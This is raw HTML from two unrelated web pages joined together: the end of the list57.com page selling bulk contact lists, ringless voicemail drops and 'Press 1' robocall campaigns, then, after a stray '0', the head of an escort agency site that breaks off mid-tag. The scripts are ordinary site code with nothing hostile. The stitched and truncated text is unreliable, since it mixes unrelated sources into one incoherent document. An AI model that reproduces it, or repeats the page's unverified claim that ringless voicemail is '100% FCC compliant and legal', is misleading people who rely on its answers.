et_hover_enabled et_pb_bg_layout_light" href="http://list57.com/internet-leads/">TARGETED BULK LISTS</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_15"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_23 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_7 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_16"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_24 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_9 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Outbound Ringless Cell Phone Voice Broadcasting" href="http://ringlessmessaging.com/" target="_blank" rel="noopener noreferrer">Ringless Cell Phone Messaging</a></strong></span></h1> <ul class="list"> <li><span style="color: #000000;"><strong>Cellphone does not ring</strong></span></li> <li><span style="color: #000000;"><strong>Cellphone owner is not billed</strong></span></li> <li><span style="color: #000000;"><strong>A phone call is never made</strong></span></li> <li><span style="color: #000000;"><strong>Message dropped into voicemail</strong></span></li> <li><span style="color: #000000;"><strong>100% FCC compliant and legal</strong></span></li> <li><span style="color: #000000;"><strong>Message dropped on the back end</strong></span></li> </ul> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_9_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_9 more-button et_hover_enabled et_pb_bg_layout_light" href="http://ringlessmessaging.com/" target="_blank">RINGLESS MESSAGING</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_25 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_8 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://ringlessmessaging.com" target="_blank"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/ringless.messaging.250.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_17"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_26 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_8 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_18"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_27 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_9 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://www.list57.com/broadcasting/email-marketing/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/email_broadcast_email_sending_email_marketing-List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_28 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_10 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Email Broadcasting, Email Marketing and Send Bulk Email" href="http://www.list57.com/broadcasting/email-marketing/">Email Broadcasting</a></strong></span></h1> <p><span style="color: #000000;"><strong>Targeted email marketing and broadcasting</strong> is the best way to reach out to any market segment. list57.com can expose your product or service to your best, targeted prospects, using our local or national databases.</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_10_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_10 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/broadcasting/email-marketing/">EMAIL BROADCASTING</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_19"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_29 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_9 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_20"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_30 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_11 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><strong><span style="color: #000000;">Postal Mailing Lists, Leads and Databases</span></strong></h1> <p><span style="color: #000000;">Direct mail is making a huge “comeback”… Marketers are finding that in a more and more virtual world, that a piece of paper in hand can be wildly popular.&nbsp; <strong>Our postal mailing lists let you target your best prospects.</strong>&nbsp; Choose from lists like new movers, home owners, renters, age groups or whatever target market you are looking to reach.&nbsp;&nbsp; Postal mailing databases often return high ROI.</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_11_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_11 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/business/">BUSINESS LISTS</a> </div><div class="et_pb_module et_pb_text et_pb_text_12 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h3 style="text-align: left;"><span style="color: #000000;"><strong>Postal mailing addresses come standard with any of our Business or Consumer Lists, Leads and Databases.</strong></span></h3> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_12_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_12 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/consumer/">CONSUMER LISTS</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_31 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_image et_pb_image_10 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://list57.com/postal/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/postal.mail_.marketing.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_21"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_32 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_10 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_22"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_33 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_13 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Investor lists and Business Marketing Lists – Phone, Mail, Email and Fax Leads" href="http://www.list57.com/custom-exclusive/">Create Your Own Custom, Exclusive, Real-Time Marketing Lists and Leads</a></strong></span></h1> <p style="text-align: left;"><span style="color: #000000;"><strong>Custom, Exclusive, Real-Time Leads is like a dream come true for most businesses. &nbsp;</strong>list57.com now makes it possible for your business to have exactly that &#8211; for a very affordable price!</span></p> <p><span style="color: #000000;"><strong>We set-up paid traffic campaigns for you in: Google, Bing, Facebook, Linked In, Banners &#8211; Your Choice of One Or All&#8230;</strong></span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_13_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_13 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/custom-exclusive/">CUSTOM LEADS</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_34 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_11 et_always_center_on_mobile"> <a href="http://www.list57.com/custom-exclusive/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/Create.Your_.Own_.Custom.Exclusive.Real_.Time_.Leads_.250h.List57.com_.jpg" alt="Create Your Own Exclusive Lists and Leads" title="Create Your Own Exclusive Lists and Leads" /></span></a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_23"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_35 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_11 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_24"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_36 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_14 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong>Inbound Live Call Transfers or Press 1 Campaign</strong></span></h1> <p style="text-align: left;"><span style="color: #000000;"><strong>We make thousands of targeted phone calls with a custom message regarding your niche, asking them to &#8220;Press 1 to be transferred to a live agent standing by&#8221;.</strong></span></p> <h3 style="text-align: center;"><span style="color: #000000;"><strong>List57.com Is The Leader In Inbound LIve Call Transfer Leads!</strong></span></h3> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_14_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_14 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/transfers/">LIVE TRANSFERS</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_37 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_image et_pb_image_12 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://www.list57.com/transfers/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2017/02/inbound.call_.transfers.List57.jpg" alt="Inbound Live Call Transfers - Press 1 Campaign" title="Inbound Live Call Transfers - Press 1 Campaign" /></span></a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_25"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_38 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_divider_12 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_26"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_39 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_image et_pb_image_13 et_pb_image_sticky et_always_center_on_mobile"> <a href="http://www.list57.com/broadcasting/voice-messaging/"><span class="et_pb_image_wrap "><img src="http://www.list57.com/wp-content/uploads/2009/11/voice.broadcasting.List57.com_.jpg" alt="" /></span></a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_40 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_with_border et_pb_module et_pb_text et_pb_text_15 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><span style="color: #000000;"><strong><a style="color: #000000;" title="Outbound Voice Broadcasting and Voice Mail Messaging" href="http://www.list57.com/broadcasting/voice-messaging/">Voice Broadcasting</a></strong></span></h1> <p><span style="color: #000000;">Voice broadcasting is a very efficient method of contacting any group of people with very little effort. It is an excellent way to get a quick response to your marketing.&nbsp; You can rent or buy our phone database, or use your own.</span></p> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_15_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_15 more-button et_hover_enabled et_pb_bg_layout_light" href="http://www.list57.com/broadcasting/voice-messaging/">VOICE BROADCASTING</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --> </div> </div> </div> <!-- .entry-content --> </article> <!-- .et_pb_post --> </div> <!-- #main-content --> <span class="et_pb_scroll_top et-pb-icon"></span> <footer id="main-footer"> <div class="container"> <div id="footer-widgets" class="clearfix"> <div class="footer-widget"><div id="nav_menu-12" class="fwidget et_pb_widget widget_nav_menu"><h4 class="title">List57.com</h4><div class="menu-list57-primary-container"><ul id="menu-list57-primary" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-79 current_page_item menu-item-has-children menu-item-9831"><a href="http://www.list57.com/" aria-current="page">Home</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6191"><a href="http://www.list57.com/about/">About</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6226"><a href="http://www.list57.com/affiliates/">Affiliates</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7461"><a href="http://www.list57.com/blog/">Blog</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6194"><a href="http://www.list57.com/join/">Newsletter</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6955"><a href="http://www.list57.com/sitemap/">Sitemap</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10689"><a href="http://www.list57.com/consulting/">Consulting</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8549"><a href="http://www.list57.com/contact/">Contact</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6193"><a href="http://www.list57.com/order/">Order</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9849"><a href="http://eepurl.com/de8aML">Get-Quote</a></li> </ul></div></div> <!-- end .fwidget --></div> <!-- end .footer-widget --><div class="footer-widget"><div id="nav_menu-10" class="fwidget et_pb_widget widget_nav_menu"><h4 class="title">Lists For Sale</h4><div class="menu-sidebar-listsforsale-container"><ul id="menu-sidebar-listsforsale" class="menu"><li id="menu-item-6210" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6210"><a href="http://www.list57.com/business/">Businesses</a></li> <li id="menu-item-6212" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6212"><a href="http://www.list57.com/consumer/">Consumers</a></li> <li id="menu-item-6216" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6216"><a href="http://www.list57.com/medical/">Medical</a></li> <li id="menu-item-8000" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8000"><a href="http://www.list57.com/real-time-leads/">Real-Time Leads</a></li> <li id="menu-item-6215" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6215"><a href="http://www.list57.com/mobilecell/consumers/">Mobile-Cell</a></li> <li id="menu-item-7999" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7999"><a href="http://www.list57.com/bizopps/">BizOpps</a></li> <li id="menu-item-6544" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6544"><a href="http://www.list57.com/investors/">Investors</a></li> <li id="menu-item-8407" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8407"><a href="http://www.list57.com/consumer/sweepstakes/">Sweepstakes</a></li> </ul></div></div> <!-- end .fwidget --></div> <!-- end .footer-widget --><div class="footer-widget"><div id="text-9" class="fwidget et_pb_widget widget_text"> <div class="textwidget"><span class="quotebutton"><a href="javascript:void(window.open('http://eepurl.com/de8aML','getquotepop', 'width=400,height=600'))"><img border="0" alt="Get Free Quote" src="http://www.list57.com/wp-content/uploads/2018/01/rfq-button-e1514939540931.png" width="125"></a></span> <span class="contactbutton"><a href="javascript:void(window.open('http://eepurl.com/de98xz','contactpop', 'width=350,height=375'))"><img border="0" alt="Contact us" src="http://www.list57.com/wp-content/uploads/2018/01/contact-button.png" height="45"></a></span> </div> </div> <!-- end .fwidget --></div> <!-- end .footer-widget --><div class="footer-widget"><div id="text-10" class="fwidget et_pb_widget widget_text"> <div class="textwidget"><span class="surveybutton"><a href="javascript:void(window.open('http://www.list57.com/survey/','surveypop', 'width=490,height=860'))">List57 Users Survey</a></span> </div> </div> <!-- end .fwidget --></div> <!-- end .footer-widget --> </div> <!-- #footer-widgets --> </div> <!-- .container --> <div id="footer-bottom"> <div class="container clearfix"> <ul class="et-social-icons"> <li class="et-social-icon et-social-facebook"> <a href="#" class="icon"> <span>Facebook</span> </a> </li> <li class="et-social-icon et-social-twitter"> <a href="#" class="icon"> <span>Twitter</span> </a> </li> <li class="et-social-icon et-social-google-plus"> <a href="#" class="icon"> <span>Google</span> </a> </li> </ul><p id="footer-info">Designed by <a href="http://www.elegantthemes.com" title="Premium WordPress Themes">Elegant Themes</a> | Powered by <a href="http://www.wordpress.org">WordPress</a></p> </div> <!-- .container --> </div> </footer> <!-- #main-footer --> </div> <!-- #et-main-area --> </div> <!-- #page-container --> <script type="text/javascript">function add_chatinline(){var hccid=81092543;var nt=document.createElement("script");nt.async=true;nt.src="https://mylivechat.com/chatinline.aspx?hccid="+hccid;var ct=document.getElementsByTagName("script")[0];ct.parentNode.insertBefore(nt,ct);}add_chatinline();</script> <script> //this is our easy contact popup code which describes and launches the window function pop(aURL,aName,aWidth,aHeight){ if (aName==undefined) {aName='contactpop'} if (aWidth==undefined) {aWidth=350} if (aHeight==undefined){aHeight=375} var Features="width="+aWidth Features+=",height="+aHeight Features+=",right=200,top=200" Features+=",toolbar=no" aName=window.open(aURL,aName,Features) aName.focus() } ///this is our get free quote popup code which describes and launches the window - notice the size difference function pop(bURL,bName,bWidth,bHeight){ if (bName==undefined) {bName='getquotepop'} if (bWidth==undefined) {bWidth=400} if (bHeight==undefined){bHeight=700} var Features="width="+bWidth Features+=",height="+bHeight Features+=",left=200,top=100" Features+=",toolbar=no" bName=window.open(bURL,bName,Features) bName.focus() } function pop(cURL,cName,cWidth,cHeight){ if (cName==undefined) {cName='surveypop'} if (cWidth==undefined) {cWidth=490} if (cHeight==undefined){cHeight=810} var Features="width="+cWidth Features+=",height="+cHeight Features+=",left=200,top=2" Features+=",toolbar=no" cName=window.open(cURL,cName,Features) cName.focus() } jQuery( "#title" ).autocomplete({ minLength: 3,//start search after 6 characters are typed source: function (request, response) { jQuery.ajax({ dataType:'json', url: '/lists/getlistwp.php?term=' + jQuery('#title').val(), data: request, success: response, error: function(jqXHR, textStatus, errorThrown) { //just leave these here - we are behind a session firewall so displaying errors here may only be viewed by team members // alert(jqXHR.status); // alert(textStatus); alert(errorThrown); //alert($('#title').val()); response([ ]); } }); }, response: function(event, ui) { if (ui.content.length == 0) jQuery("#match-message-title").text("List may not exist (check spelling)"); else jQuery("#match-message-title").empty(); }, select: function(event,ui){ var title = ui.item.value, id = ui.item.id, price = ui.item.retailprice, pagelink = ui.item.pagelink, description = ui.item.description, malslink = "http://ww4.aitsafe.com/cf/add.cfm?userid=64288154&product=" + title + "&price=" + price + "&return=" + pagelink + "&units=1&qty=1", rowcounts = ui.item.rowcounts, jsondata = JSON.parse(rowcounts); jQuery('#title').val(title); jQuery('#list_id').val(id); jQuery('#retailprice').text("Price: $" + price); jQuery('#description').text(description); //rows display box and labels jQuery('#totallabel').text("Total rows"); jQuery('#emailslabel').text("Emails"); jQuery('#phoneslabel').text("Phones"); jQuery('#addresslabel').text("Addresses"); jQuery('#morelabel').text("More"); //rows display content jQuery('#totalrows').text(jsondata['totalrows']); jQuery('#totalemails').text(jsondata['totalemails']); jQuery('#totalphones').text(jsondata['totalphones']); jQuery('#totaladdress').text(jsondata['totaladdress']); jQuery('#totalmore').text(jsondata['totalmore']); jQuery('#pagelink').text("Go to page >"); jQuery("#pagelink").attr("href", pagelink); jQuery("#pagelink").css({"background-color":"#ffffff", "border":"2px solid #3BB3DB", "padding":"6px", "color":"#3BB3DB","font-size":"1.3", "font-weight":"bold", "float":"left"}); jQuery('#malslink').text("Buy now"); jQuery("#malslink").attr("href", malslink); jQuery("#malslink").css({"background-color":"orange", "border":"1px solid #000", "border-radius":"4px", "padding":"7px", "color":"#000","font-size":"1.3", "font-weight":"bold", "float":"right"}); jQuery("#list-widget-block").css({"display":"block"}); }//end select: function... });//end $( "#title").autocomplete({.... </script> <script type="text/javascript"> </script> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-109542552-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-109542552-1'); </script><script type='text/javascript'> /* <![CDATA[ */ var DIVI = {"item_count":"%d Item","items_count":"%d Items"}; var et_shortcodes_strings = {"previous":"Previous","next":"Next"}; var et_pb_custom = {"ajaxurl":"http:\/\/www.list57.com\/wp-admin\/admin-ajax.php","images_uri":"http:\/\/www.list57.com\/wp-content\/themes\/Divi\/images","builder_images_uri":"http:\/\/www.list57.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"0e8f1f8c05","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"40dee6d425","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"79","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":"","tinymce_uri":""}; var et_pb_box_shadow_elements = []; /* ]]> */ </script> <script type='text/javascript' src='http://www.list57.com/wp-content/themes/Divi/js/custom.min.js?ver=3.21'></script> <script type='text/javascript' src='http://www.list57.com/wp-content/themes/Divi/core/admin/js/common.js?ver=3.21'></script> <script type='text/javascript' src='http://www.list57.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <title>Home - HotPinkList - Hottest Toronto Escorts - Toronto Escort Agency</title> <!--[if lt IE 9]><script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]--> <link rel="stylesheet" href="https://hotpinklist.com/wp-content/themes/Hotpink2012Q/style.css" media="screen" /> <link rel="pingback" href="https://hotpinklist.com/xmlrpc.php" /> <!-- This site is optimized with the Yoast SEO plugin v7.8 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Best Toronto Escorts, Toronto escort agency based in GTA. We take pride in our reputation and professionalism. 100% authentic real photos of our ladies."/> <link rel="canonical" href="https://hotpinklist.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - HotPinkList - Hottest Toronto Escorts - Toronto Escort Agency" /> <meta property="og:description" content="Best Toronto Escorts, Toronto escort agency based in GTA. We take pride in our reputation and professionalism. 100% authentic real photos of our ladies." /> <meta property="og:url" content="https://hotpinklist.com/" /> <meta property="og:site_name" content="HotPinkList" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Best Toronto Escorts, Toronto escort agency based in GTA. We take pride in our reputation and professionalism. 100% authentic real photos of our ladies." /> <meta name="twitter:title" content="Home - HotPinkList - Hottest Toronto Escorts - Toronto Escort Agency" /> <meta name="twitter:site" content="@HotPinkList" /> <meta name="twitter:creator" content="@HotPinkList" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/hotpinklist.com\/","name":"HotPinkList","potentialAction":{"@type":"SearchAction","target":"https:\/\/hotpinklist.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="HotPinkList &raquo; Feed" href="https://hotpinklist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="HotPinkList &raquo; Comments Feed" href="https://hotpinklist.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="HotPinkList &raquo; Home Comments Feed" href="https://hotpinklist.com/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/hotpinklist.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='xyz_cfm_short_code_style-css' href='https://hotpinklist.com/wp-content/plugins/contact-form-manager/css/xyz_cfm_shortcode_style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-style-css' href='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='layerslider_css-css' href='https://hotpinklist.com/wp-content/plugins/LayerSlider/css/layerslider.css?ver=3.5.0' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://hotpinklist.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://hotpinklist.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&#038;ver=4.9.10' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> .tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902} </style> <link rel='stylesheet' id='rtw-style-css' href='https://hotpinklist.com/wp-content/plugins/rimons-twitter-widget/css/rtw-style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.4.3' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.4.3' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.4.3' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='wp-polls-css' href='https://hotpinklist.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.8' type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('https://hotpinklist.com/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8; } </style> <link rel='stylesheet' id='wp-lightbox-2.min.css-css' href='https://hotpinklist.com/wp-content/plugins/wp-lightbox-2/styles/lightbox.min.css?ver=1.3.4' type='text/css' media='all' /> <!--[if lte IE 7]> <link rel='stylesheet' id='style.ie7.css-css' href='https://hotpinklist.com/wp-content/themes/Hotpink2012Q/style.ie7.css?ver=4.9.10' type='text/css' media='screen' /> <![endif]--> <script type='text/javascript' 